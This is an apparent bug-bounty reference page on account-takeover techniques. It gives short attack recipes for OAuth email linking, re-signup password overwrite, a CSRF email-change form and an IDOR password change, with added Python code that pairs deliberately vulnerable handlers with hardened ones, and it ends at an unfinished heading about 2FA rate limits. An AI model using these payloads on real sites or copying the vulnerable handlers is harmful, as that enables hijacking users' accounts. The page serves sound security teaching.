AllAboutBugBounty / Account Takeover.md

Account Takeover

  1. Using OAuth Misconfiguration

    • The victim has an account on evil.com.
    • The attacker creates an account on evil.com using OAuth. For example, the attacker has a Facebook account registered with the victim's email.
    • The attacker changes his/her email to the victim's email.
    • When the victim tries to create an account on evil.com, it says the email already exists.
  2. Try re-signing up using the same email

POST /newaccount
[...]
email=victim@example.com&password=1234

After signing up using the victim's email, try signing up again with the same email but a different password:

POST /newaccount
[...]
email=victim@example.com&password=hacked

Source: Link
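Both of the paths above come down to the same server-side mistake: the application treats an email address as proof of account ownership, either because the OAuth provider's email claim is trusted without an `email_verified` check (section 1) or because the signup handler upserts an existing record instead of refusing it (section 2). The following is an added example, not AllAboutBugBounty's code, that models each flaw next to a hardened version in a small in-memory account store; the users, emails and OAuth claims are constructed.

```python
# Added example (not AllAboutBugBounty's code): a minimal account store that
# models the OAuth-linking and re-signup takeovers, each next to a hardened
# version. Users, emails and OAuth claims below are constructed.
import hashlib
import hmac
import os
from typing import Optional


def hash_password(password: str, salt: Optional[bytes] = None) -> bytes:
    """PBKDF2-SHA256; the 16-byte salt is prepended to the digest."""
    salt = salt if salt is not None else os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def verify_password(password: str, stored: bytes) -> bool:
    return hmac.compare_digest(hash_password(password, stored[:16]), stored)


class AccountStore:
    def __init__(self) -> None:
        # keyed by normalised email; each record holds a password hash (None for
        # OAuth-only accounts) and the set of linked (issuer, subject) identities
        self.users: dict = {}

    # --- 2. re-signup with the same email --------------------------------
    def signup_vulnerable(self, email: str, password: str) -> str:
        """Bug: a second signup for an existing email overwrites its password."""
        self.users[email.lower()] = {"pw": hash_password(password), "linked": set()}
        return "created"

    def signup_fixed(self, email: str, password: str) -> str:
        """Fix: an existing record is never modified by the signup path."""
        key = email.lower()
        if key in self.users:
            return "email already registered"
        self.users[key] = {"pw": hash_password(password), "linked": set()}
        return "created"

    # --- 1. OAuth misconfiguration: linking by provider-supplied email ----
    def oauth_login_vulnerable(self, claims: dict) -> str:
        """Bug: whoever the provider says owns this email is logged in as the
        local account with that email, verified or not."""
        key = claims["email"].lower()
        record = self.users.setdefault(key, {"pw": None, "linked": set()})
        record["linked"].add((claims["iss"], claims["sub"]))
        return "logged in as " + key

    def oauth_login_fixed(self, claims: dict) -> str:
        """Fix: require the provider's email_verified claim, and never attach a
        new provider identity to an existing account without the owner
        re-authenticating first."""
        key = claims["email"].lower()
        identity = (claims["iss"], claims["sub"])
        if not claims.get("email_verified", False):
            return "email not verified by provider; confirmation required"
        record = self.users.get(key)
        if record is None:
            self.users[key] = {"pw": None, "linked": {identity}}
            return "logged in as " + key
        if identity in record["linked"]:
            return "logged in as " + key
        return "account exists; sign in with password to link this provider"
```

The hardened OAuth path refuses to act on an unverified email at all, and even a verified one only links to an existing local account after the owner signs in with their password; the hardened signup path simply never writes to a record that already exists. Both answers are what the writeups above are probing for.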

  3. Via CSRF
    • Create an account as the attacker and fill in the whole form; check your info in the Account Details.
    • Change the email and capture the request, then create a CSRF exploit.
    • The CSRF exploit looks like the one given below. I have replaced the email value with anyemail@*******.com and submitted the request in the victim's account.
<html>
<body>
   <!-- the hidden input needs a name attribute: a nameless input is not
        submitted with the form, so without it nothing would be changed -->
   <form action="https://evil.com/user/change-email" method="POST">
      <!-- placeholder for the address the writeup redacts -->
      <input type="hidden" name="email" value="anyemail@example.com"/>
      <input type="submit" value="Submit Request">
   </form>
</body>
</html>

Source: Link

  4. Chaining with IDOR, for example
POST /changepassword.php
Host: site.com
[...]
userid=500&password=heked123

500 is the attacker's ID and 501 is the victim's ID, so change the userid from the attacker's ID to the victim's ID.
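The change-email CSRF (section 3) and the change-password IDOR (section 4) are both failures of a state-changing endpoint to pin the request to the authenticated user: the first accepts a cross-site POST that only carries the victim's cookies, the second lets the client choose which account to modify. The following is an added example, not AllAboutBugBounty's code, showing each handler in its vulnerable form beside a hardened one. `Request`, `Session`, `USERS` and `SITE_ORIGIN` are constructed stand-ins for a real web framework, and passwords are compared as plain strings only to keep the focus on the request checks.

```python
# Added example (not AllAboutBugBounty's code): the change-email and
# change-password handlers from the CSRF and IDOR sections, vulnerable and
# hardened. Request, Session, USERS and SITE_ORIGIN are constructed stand-ins.
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    user_id: int                      # set at login, never by the client
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    form: dict
    session: Session                  # resolved from the session cookie
    headers: dict = field(default_factory=dict)


# constructed users: 500 is the attacker, 501 the victim (as in the IDOR text)
USERS = {
    500: {"email": "attacker@example.com", "password": "attacker-pw"},
    501: {"email": "victim@example.com", "password": "victim-pw"},
}
SITE_ORIGIN = "https://site.com"


def csrf_ok(req: Request) -> bool:
    """Synchronizer-token check, plus an Origin check as defence in depth.
    A cross-site form POST carries no token and a foreign Origin."""
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, req.session.csrf_token):
        return False
    origin = req.headers.get("Origin")
    return origin is None or origin == SITE_ORIGIN


def reauth_ok(req: Request) -> bool:
    """Sensitive changes also require the current password."""
    current = USERS[req.session.user_id]["password"]
    return hmac.compare_digest(req.form.get("current_password", ""), current)


# --- 3. CSRF on /user/change-email ----------------------------------------
def change_email_vulnerable(req: Request) -> str:
    """Bug: any POST that arrives with the victim's cookies is honoured."""
    USERS[req.session.user_id]["email"] = req.form["email"]
    return "email changed"


def change_email_fixed(req: Request) -> str:
    """Fix: a valid CSRF token and the current password are both required."""
    if not csrf_ok(req):
        return "rejected: CSRF check failed"
    if not reauth_ok(req):
        return "rejected: re-authentication failed"
    USERS[req.session.user_id]["email"] = req.form["email"]
    return "email changed"


# --- 4. IDOR on /changepassword.php ---------------------------------------
def change_password_vulnerable(req: Request) -> str:
    """Bug: the account to modify is whatever userid the client sends."""
    USERS[int(req.form["userid"])]["password"] = req.form["password"]
    return "password changed"


def change_password_fixed(req: Request) -> str:
    """Fix: the target account is the session's user, never the form's userid;
    a mismatching userid is rejected instead of silently ignored."""
    if not csrf_ok(req):
        return "rejected: CSRF check failed"
    if "userid" in req.form and int(req.form["userid"]) != req.session.user_id:
        return "rejected: userid does not match the authenticated user"
    if not reauth_ok(req):
        return "rejected: re-authentication failed"
    USERS[req.session.user_id]["password"] = req.form["password"]
    return "password changed"
```

Rejecting a mismatching `userid` rather than quietly substituting the session's id is deliberate: it makes IDOR probing visible in the logs, which is what a detection rule on these endpoints would key on.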

  5. No Rate Limit on 2FA